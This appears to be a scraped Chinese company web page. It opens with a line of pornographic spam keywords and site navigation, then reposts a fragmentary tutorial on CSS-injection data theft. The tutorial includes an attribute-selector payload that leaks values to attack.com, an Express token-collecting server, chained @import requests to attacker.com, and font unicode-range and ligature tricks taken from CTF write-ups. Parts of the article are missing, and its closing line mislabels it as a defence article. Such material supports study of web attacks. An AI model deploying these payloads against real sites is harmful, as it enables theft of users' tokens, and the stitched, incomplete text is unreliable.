真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

重慶分公司 重慶分公司

• 網(wǎng)站建設(shè)
• 網(wǎng)站制作
• 網(wǎng)站營(yíng)銷
• 小程序
• 新聞動(dòng)態(tài)
• 成功案例
• 關(guān)于我們
028-86922220

• 網(wǎng)站建設(shè)
• 網(wǎng)站制作
• 網(wǎng)站營(yíng)銷
• 小程序
• 新聞動(dòng)態(tài)
• 成功案例
• 關(guān)于我們

 hello world

input[value^="Z"] ~*{
    background: url(http://attack.com/Z);
}

    


>

服務(wù)器代碼是我配合它的payload寫得。

var express = require('express');
var app = express();
var path = require('path');
var token = "";

app.get('/receive/:token', function(req, res) {
    token = req.params.token;
    console.log(token)
    res.send('ok');
});

app.get('/return', function(req, res){
    res.send(token);
});

app.get('/client.html', function(req, res){
    res.sendFile(path.join(__dirname, 'client.html'));
})


var server = app.listen(8083, function() {
    var host = server.address().address
    var port = server.address().port
    console.log("Example app listening at http://%s:%s", host, port)
})

還有 師傅 通過服務(wù)器將token寫入到cookie中， 定時(shí)查詢cookie是否改變來(lái)實(shí)現(xiàn)的。

還發(fā)現(xiàn)有師傅用websocket實(shí)現(xiàn)更優(yōu)雅一些。 https://gist.github.com/cgvwzq/f7c55222fbde44fc686b17f745d0e1aa

無(wú) iframe

https://github.com/dxa4481/cssInjection 這里介紹了一種無(wú)iframe注入的方法。

原理也很簡(jiǎn)單，既然不能用iframe引入漏洞頁(yè)面，那么我們可以通過 window.open 不斷開啟一個(gè)新的窗口，也就可以完成上述類似的效果。當(dāng)然這種方法得劫持用戶的點(diǎn)擊行為，否則瀏覽器會(huì)禁止開啟新窗口。

而且這篇文章還提出了無(wú)后臺(tái)服務(wù)器的方案，利用service workers 攔截客戶端請(qǐng)求將獲取到的token值同時(shí)存在本地localstorage中。

@import

利用 @import 在chrome中的特性，https://medium.com/@d0nut/better-exfiltration-via-html-injection-31c72a2dae8b 這篇文章提出的這種方法。這種方法有種好處就是 不會(huì)刷新頁(yè)面就可以拿到全部token 而且不需要iframe，但壞處就是只能用在chrome中，而且根據(jù)它的特性必須在樣式標(biāo)簽頭部有注入才行。

除了常見的 標(biāo)簽引入外部樣式，css還可以通過 @import 。

@import url(http://style.com/css.css);

但是 @import 必須在樣式表頭部最先聲明，并且分號(hào)是必須的。 @import 引入的樣式表會(huì)直接替換對(duì)應(yīng)的內(nèi)聯(lián)樣式。

chrome在實(shí)現(xiàn)上述效果時(shí)，在每次 @import 外部樣式表 返回后 都重新計(jì)算了一遍頁(yè)面的其他的樣式表，我們可以利用這個(gè)特性嵌套 @import 使用一個(gè)請(qǐng)求便獲取到整個(gè)token

這是他文章中的一個(gè)圖，很形象。

這圖假定要竊取的數(shù)據(jù)長(zhǎng)度為3，第一次注入的css內(nèi)容為 @import url(http://attacker.com/staging); ，它返回了

@import url(http://attacker.com/polling?len=0);
@import url(http://attacker.com/polling?len=1);
@import url(http://attacker.com/polling?len=2);

這時(shí)頁(yè)面又要獲取 @import url(http://attacker.com/polling?len=0); 樣式表，而它返回的是竊取token的payload。

當(dāng)將已竊取數(shù)據(jù)發(fā)送到服務(wù)器后， @import url(http://attacker.com/polling?len=1); 才會(huì)響應(yīng)。響應(yīng)的是竊取的第二位數(shù)據(jù)的payload....

而且那篇文章還開源了一個(gè)工具利用這個(gè)漏洞，用起來(lái)非常簡(jiǎn)單。

https://github.com/d0nutptr/sic

竊取標(biāo)簽content數(shù)據(jù)

竊取標(biāo)簽content數(shù)據(jù)相對(duì)來(lái)說(shuō)就麻煩很多，去年xctf final就有一道題。

利用 unicode-range 猜測(cè)

根據(jù)https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html這位師傅的思路，可以通過指定 @font-face 的字體描述unicode-range，當(dāng)存在某個(gè)字符時(shí)就通知服務(wù)器。

AB

當(dāng)然這只能知道含有那些字符，而且當(dāng)字符一多就沒有意義了。不過這也是個(gè)不錯(cuò)的思路，在某些特定情況下可能有用。

利用連字(Ligature)

去年xctf師傅們的 題解 用的就是這個(gè)方法。

連字簡(jiǎn)而言之就是幾個(gè)字符的合體字，更多自行百度。在這里我們可以自己創(chuàng)建一個(gè)字體，其中所有字符寬度設(shè)為0，將 flag 這個(gè)連字的寬度設(shè)置非常大，此時(shí)指定標(biāo)簽content中如果出現(xiàn)了flag字符串就會(huì)因?yàn)閷挾鹊脑虺霈F(xiàn)滾動(dòng)條，檢測(cè)出現(xiàn)滾動(dòng)條時(shí)用 url() 請(qǐng)求服務(wù)器。

這樣我們就可以不斷向后猜測(cè)了，詳細(xì)的創(chuàng)建字體、payload 這里 已經(jīng)提供了。

以上是“CSS中injection的解決方法”這篇文章的所有內(nèi)容，感謝各位的閱讀！相信大家都有了一定的了解，希望分享的內(nèi)容對(duì)大家有所幫助，如果還想學(xué)習(xí)更多知識(shí)，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道！